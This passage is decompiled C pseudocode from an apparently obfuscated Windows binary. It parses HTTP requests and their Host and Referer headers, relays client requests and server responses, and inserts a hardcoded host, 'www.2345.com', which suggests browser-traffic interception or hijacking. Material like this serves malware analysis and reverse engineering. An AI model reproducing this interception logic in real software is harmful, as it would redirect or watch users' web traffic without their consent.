				_t612 =  *(__ecx + 0x18);
				_t361 =  >  ? 0 : _t359 + 2;
				 *0x3ebaf0 = _t361;
				 *0x3f0830 = _t361 & 0x00000019 | 0x000000e0;
				_t762 = E00351010(__edx, _t761, _t779, E00354910());
				_t782 = _t781 + 4;
				if(_t762 == 0) {
					L3:
					_v208 = 0;
					GetLastError();
					_t613 = _v208;
					_t756 = 0;
					_t367 = _v212;
					_t763 = 0;
					L229:
					_v8 = 0xffffffff;
					if(_t763 != 0) {
						L244:
						 *[fs:0x0] = _v16;
						_pop(_t764);
						return E002E056D(_v24 ^ _t779, _t740, _t764);
					}
					if( *((intOrPtr*)(_t367 + 0x10)) == 0xffffffff) {
						L233:
						_t765 =  *0x39e25c;
						L234:
						_t369 = _v220;
						if(_t369 != 0xffffffff) {
							 *0x3f0830 = 0x7ff7;
							 *_t765(_t369);
						}
						_t370 =  *0x3ebae8; // 0x6556
						_t372 =  >  ? 0 : _t370 + 2;
						 *0x3ebae8 = _t372;
						 *0x3f0830 = _t372 & 0x00000019 | 0x000000e0;
						if(_t613 != 0) {
							E002D16F0(_t613, _t740);
						}
						if(_t756 != 0) {
							E002D16F0(_t756, _t740);
						}
						_t625 = _v224;
						if(_t625 != 0) {
							 *((intOrPtr*)( *_t625))(1);
						}
						_t626 = _v228;
						if(_t626 != 0) {
							 *((intOrPtr*)( *_t626))(1);
						}
						goto L244;
					}
					_t382 =  *((intOrPtr*)(_t367 + 0x10));
					if(_t382 == 0xffffffff) {
						goto L233;
					}
					_t765 =  *0x39e25c;
					 *0x3f0830 = 0x7ff7;
					 *_t765(_t382);
					 *((intOrPtr*)(_v212 + 0x10)) = 0xffffffff;
					goto L234;
				}
				E00351480(_t762, 0, 0);
				_t740 = _t612;
				_t386 = E002D1780(_t612, _t762, _t612, _t755);
				_t783 = _t782 + 0x10;
				if(_t386 == 0) {
					goto L3;
				}
				_t613 = E00351E70(_t740, _t755, _t762, _t779, _t762);
				_t784 = _t783 + 4;
				_v208 = _t613;
				if(_t613 != 0) {
					E0034FD20( *((intOrPtr*)(_t613 + 0xe4)), 5);
					_t389 =  *0x3eba88; // 0x3dce7c
					_v236 = _t613;
					 *((intOrPtr*)(_t389 + 4))();
					E003523F0(_t613, _t740, _t755, __eflags, _t613,  *((intOrPtr*)(_v212 + 0x10)));
					_t786 = _t784 + 0x10;
					while(1) {
						_t393 = E003514A0(_t613);
						_t787 = _t786 + 4;
						__eflags = _t393 - 1;
						if(_t393 == 1) {
							break;
						}
						_t604 = E00351BB0(_t613, 0xffffffff);
						_t786 = _t787 + 8;
						__eflags = _t604 - 3;
						if(_t604 == 3) {
							L8:
							_t605 =  *0x3ebaec; // 0x6556
							_t606 = _t605 + 2;
							__eflags = _t606 - 0x1490;
							_t607 =  >  ? 0 : _t606;
							 *0x3ebaec = _t607;
							 *0x3f0830 = _t607 & 0x00000019 | 0x000000e0;
							continue;
						}
						__eflags = _t604 - 2;
						if(_t604 != 2) {
							 *0x3f0830 = 0x7ff7;
							_t766 = _t762 | 0xffffffff;
							L11:
							_v8 = 1;
							_t394 =  *0x3eba88; // 0x3dce7c
							 *((intOrPtr*)(_t394 + 8))();
							_v8 = 0;
							_t396 =  *0x3ebaf8; // 0x6556
							_t397 = _t396 + 2;
							__eflags = _t397 - 0x1490;
							_t398 =  >  ? 0 : _t397;
							 *0x3ebaf8 = _t398;
							 *0x3f0830 = _t398 & 0x00000019 | 0x000000e0;
							__eflags = _t766;
							if(_t766 >= 0) {
								_t767 = E00351D20(_t613);
								_t402 =  *0x3ebad4; // 0x6556
								_t788 = _t787 + 4;
								_t403 = _t402 + 2;
								__eflags = _t403 - 0x1490;
								_t404 =  >  ? 0 : _t403;
								 *0x3ebad4 = _t404;
								 *0x3f0830 = _t404 & 0x00000019 | 0x000000e0;
								__eflags = _t767;
								if(_t767 != 0) {
									_push(0);
									_push(0);
									_push(E002E21F0(_t767));
									L00380508(E002E4540(_t613, _t740, _t755));
									 *0x3f0830 = 0x7ff7;
									_push(0);
									_push(0);
									_push(E002E21B0(_t767));
									L00380508(E002E4540(_t613, _t740, _t755));
									_t594 =  *0x3ebad0; // 0x6556
									_t595 = _t594 + 2;
									__eflags = _t595 - 0x1490;
									_t596 =  >  ? 0 : _t595;
									 *0x3ebad0 = _t596;
									_t598 = _t596 & 0x00000019 | 0x000000e0;
									__eflags = _t598;
									 *0x3f0830 = _t598;
									E002E1A90(_t767);
									_t788 = _t788 + 0x2c;
								}
								_t740 = _t613;
								E002D13F0( &_v48, _t613);
								_v8 = 2;
								__eflags = _v32;
								if(_v32 != 0) {
									_t789 = _t788 - 0x18;
									_t741 = _t789;
									_v196 = _t789;
									 *(_t741 + 0x10) = 0;
									 *(_t741 + 0x14) = 0;
									 *(_t741 + 0x14) = 0xf;
									__eflags =  *(_t741 + 0x14) - 0x10;
									 *(_t741 + 0x10) = 0;
									if( *(_t741 + 0x14) < 0x10) {
										_t408 = _t741;
									} else {
										_t408 =  *_t741;
									}
									 *_t408 = 0;
									__eflags = "Host";
									if("Host" != 0) {
										_t635 = "Host";
										_t767 =  &(_t635[1]);
										do {
											_t409 =  *_t635;
											_t635 =  &(_t635[1]);
											__eflags = _t409;
										} while (_t409 != 0);
										_t636 = _t635 - _t767;
										__eflags = _t636;
										goto L25;
									} else {
										_t636 = 0;
										L25:
										_push(_t636);
										E002D0860(_t613, _t741, "Host");
										_t790 = _t789 - 0x18;
										_v8 = 3;
										_t638 = _t790;
										 *(_t638 + 0x10) = 0;
										 *(_t638 + 0x14) = 0;
										 *(_t638 + 0x14) = 0xf;
										__eflags =  *(_t638 + 0x14) - 0x10;
										 *(_t638 + 0x10) = 0;
										if( *(_t638 + 0x14) < 0x10) {
											_t411 = _t638;
										} else {
											_t411 =  *_t638;
										}
										_push(0xffffffff);
										 *_t411 = 0;
										_push(0);
										E002D0960(_t613, _t638,  &_v48);
										_v8 = 2;
										E002CFAE0(_t613,  &_v192, _t755, _t767, __eflags);
										_t792 = _t790 + 0x30 - 0x18;
										_v8 = 4;
										_t640 = _t792;
										 *(_t640 + 0x10) = 0;
										 *(_t640 + 0x14) = 0;
										 *(_t640 + 0x14) = 0xf;
										__eflags =  *(_t640 + 0x14) - 0x10;
										 *(_t640 + 0x10) = 0;
										if( *(_t640 + 0x14) < 0x10) {
											_t415 = _t640;
										} else {
											_t415 =  *_t640;
										}
										_push(0xffffffff);
										 *_t415 = 0;
										_push(0);
										E002D0960(_t613, _t640,  &_v192);
										E002DA8E0(_t613,  &_v168, _t741, _t755);
										_t793 = _t792 + 0x18;
										_v76 = 0xf;
										_v80 = 0;
										_v96 = 0;
										_v52 = 0xf;
										_v56 = 0;
										_v72 = 0;
										_t740 =  &_v96;
										_v8 = 7;
										E002D95C0(_t613,  &_v168,  &_v96, _t755);
										__eflags = _v152;
										if(_v152 != 0) {
											_t420 =  *0x3ebaf4; // 0x6556
											_t421 = _t420 + 2;
											__eflags = _t421 - 0x1490;
											_t422 =  >  ? 0 : _t421;
											_t794 = _t793 - 0x18;
											_t644 = _t794;
											 *0x3ebaf4 = _t422;
											_v196 = _t794;
											 *0x3f0830 = _t422 & 0x00000019 | 0x000000e0;
											 *(_t644 + 0x10) = 0;
											 *(_t644 + 0x14) = 0;
											 *(_t644 + 0x14) = 0xf;
											__eflags =  *(_t644 + 0x14) - 0x10;
											 *(_t644 + 0x10) = 0;
											if( *(_t644 + 0x14) < 0x10) {
												_t425 = _t644;
											} else {
												_t425 =  *_t644;
											}
											_push(0xffffffff);
											 *_t425 = 0;
											_push(0);
											E002D0960(_t613, _t644,  &_v168);
											_t795 = _t794 - 0x18;
											_v8 = 8;
											_t742 = _t795;
											 *(_t742 + 0x10) = 0;
											 *(_t742 + 0x14) = 0;
											 *(_t742 + 0x14) = 0xf;
											__eflags =  *(_t742 + 0x14) - 0x10;
											 *(_t742 + 0x10) = 0;
											if( *(_t742 + 0x14) < 0x10) {
												_t428 = _t742;
											} else {
												_t428 =  *_t742;
											}
											 *_t428 = 0;
											__eflags = "Host";
											if("Host" != 0) {
												_t645 = "Host";
												_t768 =  &(_t645[1]);
												do {
													_t429 =  *_t645;
													_t645 =  &(_t645[1]);
													__eflags = _t429;
												} while (_t429 != 0);
												_t646 = _t645 - _t768;
												__eflags = _t646;
												goto L45;
											} else {
												_t646 = 0;
												L45:
												_push(_t646);
												E002D0860(_t613, _t742, "Host");
												_v8 = 7;
												E002CFCB0(_t613,  &_v48, _t755, __eflags);
												_t755 =  &_v72;
												_t797 = _t795 + 0x30 - 0x18;
												_t649 = _t797;
												_v196 = _t797;
												 *(_t649 + 0x10) = 0;
												 *(_t649 + 0x14) = 0;
												 *(_t649 + 0x14) = 0xf;
												__eflags =  *(_t649 + 0x14) - 0x10;
												 *(_t649 + 0x10) = 0;
												if( *(_t649 + 0x14) < 0x10) {
													_t432 = _t649;
												} else {
													_t432 =  *_t649;
												}
												_push(0xffffffff);
												 *_t432 = 0;
												_push(0);
												E002D0960(_t613, _t649,  &_v96);
												_t798 = _t797 - 0x18;
												_v8 = 9;
												_t743 = _t798;
												_v204 = _t798;
												 *(_t743 + 0x10) = 0;
												 *(_t743 + 0x14) = 0;
												 *(_t743 + 0x14) = 0xf;
												__eflags =  *(_t743 + 0x14) - 0x10;
												 *(_t743 + 0x10) = 0;
												if( *(_t743 + 0x14) < 0x10) {
													_t435 = _t743;
												} else {
													_t435 =  *_t743;
												}
												 *_t435 = 0;
												__eflags =  *((char*)(" HTTP"));
												if( *((char*)(" HTTP")) != 0) {
													_t650 = " HTTP";
													_t769 = _t650 + 1;
													do {
														_t436 =  *_t650;
														_t650 = _t650 + 1;
														__eflags = _t436;
													} while (_t436 != 0);
													_t651 = _t650 - _t769;
													__eflags = _t651;
													goto L56;
												} else {
													_t651 = 0;
													L56:
													_push(_t651);
													E002D0860(_t613, _t743, " HTTP");
													_t799 = _t798 - 0x18;
													_v8 = 0xa;
													_t744 = _t799;
													 *(_t744 + 0x10) = 0;
													 *(_t744 + 0x14) = 0;
													 *(_t744 + 0x14) = 0xf;
													__eflags =  *(_t744 + 0x14) - 0x10;
													 *(_t744 + 0x10) = 0;
													if( *(_t744 + 0x14) < 0x10) {
														_t438 = _t744;
													} else {
														_t438 =  *_t744;
													}
													 *_t438 = 0;
													__eflags = "GET ";
													if("GET " != 0) {
														_t653 = "GET ";
														_t770 =  &(_t653[1]);
														do {
															_t439 =  *_t653;
															_t653 =  &(_t653[1]);
															__eflags = _t439;
														} while (_t439 != 0);
														_t654 = _t653 - _t770;
														__eflags = _t654;
														goto L64;
													} else {
														_t654 = 0;
														L64:
														_push(_t654);
														E002D0860(_t613, _t744, "GET ");
														_v8 = 7;
														_t441 = E002CFE90(_t613,  &_v48, _t755, _t755);
														_t800 = _t799 + 0x48;
														__eflags = _t441;
														if(_t441 != 0) {
															L85:
															_t801 = _t800 - 0x18;
															_v196 = _t801;
															E002D4D50(_t801,  &_v192,  &_v72);
															_t803 = _t801 + 4 - 0x18;
															_v8 = 0xd;
															_t747 = _t803;
															_v204 = _t803;
															 *(_t747 + 0x10) = 0;
															 *(_t747 + 0x14) = 0;
															 *(_t747 + 0x14) = 0xf;
															__eflags =  *(_t747 + 0x14) - 0x10;
															 *(_t747 + 0x10) = 0;
															if( *(_t747 + 0x14) < 0x10) {
																_t444 = _t747;
															} else {
																_t444 =  *_t747;
															}
															 *_t444 = 0;
															__eflags = "Host";
															if("Host" != 0) {
																_t658 = "Host";
																_t771 =  &(_t658[1]);
																do {
																	_t445 =  *_t658;
																	_t658 =  &(_t658[1]);
																	__eflags = _t445;
																} while (_t445 != 0);
																_t659 = _t658 - _t771;
																__eflags = _t659;
																goto L93;
															} else {
																_t659 = 0;
																L93:
																_push(_t659);
																E002D0860(_t613, _t747, "Host");
																_t804 = _t803 - 0x18;
																_v8 = 0xe;
																_t748 = _t804;
																 *(_t748 + 0x10) = 0;
																 *(_t748 + 0x14) = 0;
																 *(_t748 + 0x14) = 0xf;
																__eflags =  *(_t748 + 0x14) - 0x10;
																 *(_t748 + 0x10) = 0;
																if( *(_t748 + 0x14) < 0x10) {
																	_t447 = _t748;
																} else {
																	_t447 =  *_t748;
																}
																 *_t447 = 0;
																__eflags = "Referer";
																if("Referer" != 0) {
																	_t661 = "Referer";
																	_t772 =  &(_t661[1]);
																	do {
																		_t448 =  *_t661;
																		_t661 =  &(_t661[1]);
																		__eflags = _t448;
																	} while (_t448 != 0);
																	_t662 = _t661 - _t772;
																	__eflags = _t662;
																	goto L101;
																} else {
																	_t662 = 0;
																	L101:
																	_push(_t662);
																	E002D0860(_t613, _t748, "Referer");
																	_v8 = 7;
																	E002D0070(_t613,  &_v48, _t755, __eflags);
																	_t806 = _t804 + 0x48 - 0x18;
																	_t740 = _t806;
																	_v196 = _t806;
																	 *(_t740 + 0x10) = 0;
																	 *(_t740 + 0x14) = 0;
																	 *(_t740 + 0x14) = 0xf;
																	__eflags =  *(_t740 + 0x14) - 0x10;
																	 *(_t740 + 0x10) = 0;
																	if( *(_t740 + 0x14) < 0x10) {
																		_t451 = _t740;
																	} else {
																		_t451 =  *_t740;
																	}
																	 *_t451 = 0;
																	__eflags = "Host";
																	if("Host" != 0) {
																		_t665 = "Host";
																		_t772 =  &(_t665[1]);
																		do {
																			_t452 =  *_t665;
																			_t665 =  &(_t665[1]);
																			__eflags = _t452;
																		} while (_t452 != 0);
																		_t666 = _t665 - _t772;
																		__eflags = _t666;
																		goto L109;
																	} else {
																		_t666 = 0;
																		L109:
																		_push(_t666);
																		E002D0860(_t613, _t740, "Host");
																		_t807 = _t806 - 0x18;
																		_v8 = 0xf;
																		_t668 = _t807;
																		 *(_t668 + 0x10) = 0;
																		 *(_t668 + 0x14) = 0;
																		 *(_t668 + 0x14) = 0xf;
																		__eflags =  *(_t668 + 0x14) - 0x10;
																		 *(_t668 + 0x10) = 0;
																		if( *(_t668 + 0x14) < 0x10) {
																			_t454 = _t668;
																		} else {
																			_t454 =  *_t668;
																		}
																		_push(0xffffffff);
																		 *_t454 = 0;
																		_push(0);
																		E002D0960(_t613, _t668,  &_v48);
																		_v8 = 7;
																		E002CFAE0(_t613,  &_v120, _t755, _t772, __eflags);
																		_t809 = _t807 + 0x30 - 0x18;
																		_v8 = 0x10;
																		_t670 = _t809;
																		 *0x3f0830 = 0x7ff7;
																		 *(_t670 + 0x10) = 0;
																		 *(_t670 + 0x14) = 0;
																		 *(_t670 + 0x14) = 0xf;
																		__eflags =  *(_t670 + 0x14) - 0x10;
																		 *(_t670 + 0x10) = 0;
																		if( *(_t670 + 0x14) < 0x10) {
																			_t458 = _t670;
																		} else {
																			_t458 =  *_t670;
																		}
																		_push(0xffffffff);
																		 *_t458 = 0;
																		_push(0);
																		E002D0960(_t613, _t670,  &_v120);
																		E002D1DF0(_t613,  &_v144, _t755, __eflags);
																		_t810 = _t809 + 0x18;
																		_v8 = 0x11;
																		__eflags = _v128;
																		if(_v128 != 0) {
																			_t811 = _t810 - 0x18;
																			_t672 = _t811;
																			 *(_t672 + 0x10) = 0;
																			 *(_t672 + 0x14) = 0;
																			 *(_t672 + 0x14) = 0xf;
																			__eflags =  *(_t672 + 0x14) - 0x10;
																			 *(_t672 + 0x10) = 0;
																			if( *(_t672 + 0x14) < 0x10) {
																				_t462 = _t672;
																			} else {
																				_t462 =  *_t672;
																			}
																			_push(0xffffffff);
																			 *_t462 = 0;
																			_push(0);
																			E002D0960(_t613, _t672,  &_v120);
																			_t465 = E002D1F30(_t613, _t755, __eflags);
																			_t466 =  *0x3ebae4; // 0x6556
																			_t812 = _t811 + 0x18;
																			_t467 = _t466 + 2;
																			_t740 = _t465 & 0x0000ffff;
																			__eflags = _t467 - 0x1490;
																			_t468 =  >  ? 0 : _t467;
																			 *0x3ebae4 = _t468;
																			__eflags = _v124 - 0x10;
																			 *0x3f0830 = _t468 & 0x00000019 | 0x000000e0;
																			_t675 =  >=  ? _v144 :  &_v144;
																			_t773 = E002D1D10(_t613,  >=  ? _v144 :  &_v144, _t465 & 0x0000ffff, _t755);
																			_v220 = _t773;
																			__eflags = _t773 - 0xffffffff;
																			if(_t773 == 0xffffffff) {
																				goto L116;
																			} else {
																				__eflags = _v100 - 0x10;
																				_t775 =  >=  ? _v120 :  &_v120;
																				_t481 = E00351010(_t740, _t775, _t779, E00353730());
																				_t813 = _t812 + 4;
																				__eflags = _t481;
																				if(_t481 != 0) {
																					_t758 = E00351E70(_t740, _t755, _t775, _t779, _t481);
																					_t814 = _t813 + 4;
																					_v200 = _t758;
																					__eflags = _t758;
																					if(_t758 != 0) {
																						E0034FD20( *((intOrPtr*)(_t758 + 0xe4)), 5);
																						_t814 = _t814 + 8;
																						__eflags = _t775;
																						if(_t775 == 0) {
																							L132:
																							_t776 = _v220;
																							_v216 = _t758;
																							__eflags = _v220;
																							if(__eflags != 0) {
																								E003523F0(_t613, _t740, _t758, __eflags, _t758, _t776);
																								_t485 = E003516A0(_t758);
																								_t815 = _t814 + 0xc;
																								__eflags = _t485 - 1;
																								if(_t485 != 1) {
																									goto L133;
																								}
																								_t494 =  *0x3ebae0; // 0x6556
																								_t495 = _t494 + 2;
																								__eflags = _t495 - 0x1490;
																								_t496 =  >  ? 0 : _t495;
																								 *0x3ebae0 = _t496;
																								__eflags = _v28 - 0x10;
																								 *0x3f0830 = _t496 & 0x00000019 | 0x000000e0;
																								_t740 =  >=  ? _v48 :  &_v48;
																								_t499 = E002D1600(_t758,  >=  ? _v48 :  &_v48, _v32);
																								_t816 = _t815 + 4;
																								__eflags = _t499;
																								if(__eflags == 0) {
																									L134:
																									E002D0420(_t613,  &_v144, _t758);
																									E002D0420(_t613,  &_v120, _t758);
																									E002D0420(_t613,  &_v72, _t758);
																									E002D0420(_t613,  &_v96, _t758);
																									E002D0420(_t613,  &_v168, _t758);
																									E002D0420(_t613,  &_v192, _t758);
																									E002D0420(_t613,  &_v48, _t758);
																									_t756 = _v200;
																									_t763 = 0;
																									_t367 = _v212;
																									goto L229;
																								}
																								_t500 = E002E057E(_t740, _t776, __eflags, 0x1c);
																								_t817 = _t816 + 4;
																								_v196 = _t500;
																								_t501 = E002D5090(_t500, _t613, _t758, "from client request");
																								_v224 = _t501;
																								__eflags = _t501;
																								if(__eflags == 0) {
																									goto L133;
																								}
																								_v204 = _t501;
																								 *0x3f0830 = 0x7ff7;
																								_v248 = 0x3dce74;
																								_t759 =  *((intOrPtr*)(_v212 + 0x14));
																								_t777 = _t759 + 0x18;
																								_v244 = _t777;
																								 *((intOrPtr*)( *((intOrPtr*)(_t759 + 0x18)) + 4))();
																								_v8 = 0x12;
																								_t505 =  *((intOrPtr*)(_t759 + 0x10));
																								_v196 =  *((intOrPtr*)(_t759 + 0x10));
																								_t740 = E002D2840(_t740, __eflags,  *((intOrPtr*)(_t759 + 0x10)),  *((intOrPtr*)(_t505 + 4)),  &_v204);
																								__eflags = 0x15555554 -  *((intOrPtr*)(_t759 + 0x14)) - 1;
																								if(__eflags < 0) {
																									_push("list<T> too long");
																									E002E0520();
																								}
																								 *((intOrPtr*)(_t759 + 0x14)) =  *((intOrPtr*)(_t759 + 0x14)) + 1;
																								 *0x3f0830 = 0x7ff7;
																								 *(_v196 + 4) = _t740;
																								 *( *(_t740 + 4)) = _t740;
																								_v8 = 0x13;
																								 *((intOrPtr*)( *_t777 + 8))();
																								_v8 = 0x11;
																								_t511 = E002E057E(_t740, _t777, __eflags, 0x1c);
																								_t818 = _t817 + 4;
																								_t756 = _v200;
																								_v196 = _t511;
																								_t512 = E002D5090(_t511, _t756, _v208, "from server response");
																								_v228 = _t512;
																								__eflags = _t512;
																								if(__eflags != 0) {
																									_v196 = _t512;
																									_v248 = 0x3dce74;
																									_t778 =  *((intOrPtr*)(_v212 + 0x14));
																									_t261 = _t778 + 0x18; // 0x18
																									_t760 = _t261;
																									_v244 = _t760;
																									 *((intOrPtr*)( *((intOrPtr*)(_t778 + 0x18)) + 4))();
																									_v8 = 0x14;
																									_t516 =  *((intOrPtr*)(_t778 + 0x10));
																									_v204 =  *((intOrPtr*)(_t778 + 0x10));
																									_t517 = E002D2840(_t740, __eflags,  *((intOrPtr*)(_t778 + 0x10)),  *((intOrPtr*)(_t516 + 4)),  &_v196);
																									_t616 = 0x15555554 -  *((intOrPtr*)(_t778 + 0x14));
																									_t702 = _t517;
																									__eflags = 0x15555554 -  *((intOrPtr*)(_t778 + 0x14)) - 1;
																									if(0x15555554 -  *((intOrPtr*)(_t778 + 0x14)) < 1) {
																										_push("list<T> too long");
																										E002E0520();
																									}
																									 *((intOrPtr*)(_t778 + 0x14)) =  *((intOrPtr*)(_t778 + 0x14)) + 1;
																									 *0x3f0830 = 0x7ff7;
																									 *((intOrPtr*)(_v204 + 4)) = _t702;
																									 *((intOrPtr*)( *((intOrPtr*)(_t702 + 4)))) = _t702;
																									_v8 = 0x15;
																									 *((intOrPtr*)( *_t760 + 8))();
																									_t522 =  *0x3ebadc; // 0x6556
																									_t523 = _t522 + 2;
																									_v8 = 0x10;
																									__eflags = _t523 - 0x1490;
																									_t524 =  >  ? 0 : _t523;
																									_t763 = 1;
																									 *0x3ebadc = _t524;
																									 *0x3f0830 = _t524 & 0x00000019 | 0x000000e0;
																									_t527 = _v124;
																									__eflags = _t527 - 0x10;
																									if(_t527 >= 0x10) {
																										_t717 = _v144;
																										__eflags = _t527 + 1 - 0x1000;
																										if(_t527 + 1 >= 0x1000) {
																											__eflags = _t717 & 0x0000001f;
																											if(__eflags != 0) {
																												E0037F981(_t616, _t717, _t760, __eflags);
																											}
																											_t560 =  *(_t717 - 4);
																											__eflags = _t560 - _t717;
																											if(__eflags >= 0) {
																												_t560 = E0037F981(_t616, _t717, _t760, __eflags);
																											}
																											_t718 = _t717 - _t560;
																											__eflags = _t718 - 4;
																											if(__eflags < 0) {
																												_t560 = E0037F981(_t616, _t718, _t760, __eflags);
																											}
																											__eflags = _t718 - 0x23;
																											if(__eflags > 0) {
																												_t560 = E0037F981(_t616, _t718, _t760, __eflags);
																											}
																											_t717 = _t560;
																										}
																										L002E05B1(_t717);
																										_t818 = _t818 + 4;
																									}
																									_v8 = 7;
																									_t528 = _v100;
																									_v124 = 0xf;
																									_v128 = 0;
																									_v144 = 0;
																									__eflags = _t528 - 0x10;
																									if(_t528 >= 0x10) {
																										_t715 = _v120;
																										__eflags = _t528 + 1 - 0x1000;
																										if(_t528 + 1 >= 0x1000) {
																											__eflags = _t715 & 0x0000001f;
																											if(__eflags != 0) {
																												E0037F981(_t616, _t715, _t760, __eflags);
																											}
																											_t556 =  *(_t715 - 4);
																											__eflags = _t556 - _t715;
																											if(__eflags >= 0) {
																												_t556 = E0037F981(_t616, _t715, _t760, __eflags);
																											}
																											_t716 = _t715 - _t556;
																											__eflags = _t716 - 4;
																											if(__eflags < 0) {
																												_t556 = E0037F981(_t616, _t716, _t760, __eflags);
																											}
																											__eflags = _t716 - 0x23;
																											if(__eflags > 0) {
																												_t556 = E0037F981(_t616, _t716, _t760, __eflags);
																											}
																											_t715 = _t556;
																										}
																										L002E05B1(_t715);
																										_t818 = _t818 + 4;
																									}
																									_v8 = 6;
																									_t529 = _v52;
																									_v100 = 0xf;
																									_v104 = 0;
																									_v120 = 0;
																									__eflags = _t529 - 0x10;
																									if(_t529 >= 0x10) {
																										_t713 = _v72;
																										__eflags = _t529 + 1 - 0x1000;
																										if(_t529 + 1 >= 0x1000) {
																											__eflags = _t713 & 0x0000001f;
																											if(__eflags != 0) {
																												E0037F981(_t616, _t713, _t760, __eflags);
																											}
																											_t552 =  *(_t713 - 4);
																											__eflags = _t552 - _t713;
																											if(__eflags >= 0) {
																												_t552 = E0037F981(_t616, _t713, _t760, __eflags);
																											}
																											_t714 = _t713 - _t552;
																											__eflags = _t714 - 4;
																											if(__eflags < 0) {
																												_t552 = E0037F981(_t616, _t714, _t760, __eflags);
																											}
																											__eflags = _t714 - 0x23;
																											if(__eflags > 0) {
																												_t552 = E0037F981(_t616, _t714, _t760, __eflags);
																											}
																											_t713 = _t552;
																										}
																										L002E05B1(_t713);
																										_t818 = _t818 + 4;
																									}
																									_v8 = 5;
																									_t530 = _v76;
																									_v52 = 0xf;
																									_v56 = 0;
																									_v72 = 0;
																									__eflags = _t530 - 0x10;
																									if(_t530 >= 0x10) {
																										_t711 = _v96;
																										__eflags = _t530 + 1 - 0x1000;
																										if(_t530 + 1 >= 0x1000) {
																											__eflags = _t711 & 0x0000001f;
																											if(__eflags != 0) {
																												E0037F981(_t616, _t711, _t760, __eflags);
																											}
																											_t548 =  *(_t711 - 4);
																											__eflags = _t548 - _t711;
																											if(__eflags >= 0) {
																												_t548 = E0037F981(_t616, _t711, _t760, __eflags);
																											}
																											_t712 = _t711 - _t548;
																											__eflags = _t712 - 4;
																											if(__eflags < 0) {
																												_t548 = E0037F981(_t616, _t712, _t760, __eflags);
																											}
																											__eflags = _t712 - 0x23;
																											if(__eflags > 0) {
																												_t548 = E0037F981(_t616, _t712, _t760, __eflags);
																											}
																											_t711 = _t548;
																										}
																										L002E05B1(_t711);
																										_t818 = _t818 + 4;
																									}
																									_v8 = 4;
																									_t531 = _v148;
																									_v76 = 0xf;
																									_v80 = 0;
																									_v96 = 0;
																									__eflags = _t531 - 0x10;
																									if(_t531 >= 0x10) {
																										_t709 = _v168;
																										__eflags = _t531 + 1 - 0x1000;
																										if(_t531 + 1 >= 0x1000) {
																											__eflags = _t709 & 0x0000001f;
																											if(__eflags != 0) {
																												E0037F981(_t616, _t709, _t760, __eflags);
																											}
																											_t544 =  *(_t709 - 4);
																											__eflags = _t544 - _t709;
																											if(__eflags >= 0) {
																												_t544 = E0037F981(_t616, _t709, _t760, __eflags);
																											}
																											_t710 = _t709 - _t544;
																											__eflags = _t710 - 4;
																											if(__eflags < 0) {
																												_t544 = E0037F981(_t616, _t710, _t760, __eflags);
																											}
																											__eflags = _t710 - 0x23;
																											if(__eflags > 0) {
																												_t544 = E0037F981(_t616, _t710, _t760, __eflags);
																											}
																											_t709 = _t544;
																										}
																										L002E05B1(_t709);
																										_t818 = _t818 + 4;
																									}
																									_v8 = 2;
																									_t532 = _v172;
																									_v148 = 0xf;
																									_v152 = 0;
																									_v168 = 0;
																									__eflags = _t532 - 0x10;
																									if(_t532 >= 0x10) {
																										_t707 = _v192;
																										__eflags = _t532 + 1 - 0x1000;
																										if(_t532 + 1 >= 0x1000) {
																											__eflags = _t707 & 0x0000001f;
																											if(__eflags != 0) {
																												E0037F981(_t616, _t707, _t760, __eflags);
																											}
																											_t540 =  *(_t707 - 4);
																											__eflags = _t540 - _t707;
																											if(__eflags >= 0) {
																												_t540 = E0037F981(_t616, _t707, _t760, __eflags);
																											}
																											_t708 = _t707 - _t540;
																											__eflags = _t708 - 4;
																											if(__eflags < 0) {
																												_t540 = E0037F981(_t616, _t708, _t760, __eflags);
																											}
																											__eflags = _t708 - 0x23;
																											if(__eflags > 0) {
																												_t540 = E0037F981(_t616, _t708, _t760, __eflags);
																											}
																											_t707 = _t540;
																										}
																										L002E05B1(_t707);
																										_t818 = _t818 + 4;
																									}
																									_v8 = 0;
																									_t533 = _v28;
																									_v172 = 0xf;
																									_v176 = 0;
																									_v192 = 0;
																									__eflags = _t533 - 0x10;
																									if(_t533 >= 0x10) {
																										_t705 = _v48;
																										__eflags = _t533 + 1 - 0x1000;
																										if(_t533 + 1 >= 0x1000) {
																											__eflags = _t705 & 0x0000001f;
																											if(__eflags != 0) {
																												E0037F981(_t616, _t705, _t760, __eflags);
																											}
																											_t536 =  *(_t705 - 4);
																											__eflags = _t536 - _t705;
																											if(__eflags >= 0) {
																												_t536 = E0037F981(_t616, _t705, _t760, __eflags);
																											}
																											_t706 = _t705 - _t536;
																											__eflags = _t706 - 4;
																											if(__eflags < 0) {
																												_t536 = E0037F981(_t616, _t706, _t760, __eflags);
																											}
																											__eflags = _t706 - 0x23;
																											if(__eflags > 0) {
																												_t536 = E0037F981(_t616, _t706, _t760, __eflags);
																											}
																											_t705 = _t536;
																										}
																										L002E05B1(_t705);
																									}
																									_t756 = _v200;
																									_t613 = _v208;
																									_t367 = _v212;
																									_v28 = 0xf;
																									_v32 = 0;
																									_v48 = 0;
																								} else {
																									GetLastError();
																									E002D0420(0x15555554,  &_v144, _t756);
																									E002D0420(0x15555554,  &_v120, _t756);
																									E002D0420(0x15555554,  &_v72, _t756);
																									E002D0420(0x15555554,  &_v96, _t756);
																									E002D0420(0x15555554,  &_v168, _t756);
																									E002D0420(0x15555554,  &_v192, _t756);
																									E002D0420(0x15555554,  &_v48, _t756);
																									_t613 = _v208;
																									_t763 = 0;
																									_t367 = _v212;
																								}
																								goto L229;
																							}
																							L133:
																							GetLastError();
																							goto L134;
																						}
																						E003516D0(_t758, 0x37, 0, _t775);
																						_t814 = _t814 + 0x10;
																						__eflags =  *_t775;
																						if( *_t775 != 0) {
																							_t726 = _t775;
																							_t740 = _t726 + 1;
																							do {
																								_t573 =  *_t726;
																								_t726 = _t726 + 1;
																								__eflags = _t573;
																							} while (_t573 != 0);
																							_t727 = _t726 - _t740;
																							__eflags = _t727;
																							L131:
																							_push(_t727);
																							E002D0860(_t613, "www.2345.com", _t775);
																							goto L132;
																						}
																						_t727 = 0;
																						goto L131;
																					}
																					_v200 = _t758;
																					goto L132;
																				}
																				_t758 = 0;
																				_v200 = 0;
																				goto L132;
																			}
																		} else {
																			L116:
																			GetLastError();
																			E002D0420(_t613,  &_v144, _t755);
																			E002D0420(_t613,  &_v120, _t755);
																			goto L33;
																		}
																	}
																}
															}
														}
														_t820 = _t800 - 0x18;
														_t755 =  &_v72;
														_t729 = _t820;
														_v196 = _t820;
														 *(_t729 + 0x10) = 0;
														 *(_t729 + 0x14) = 0;
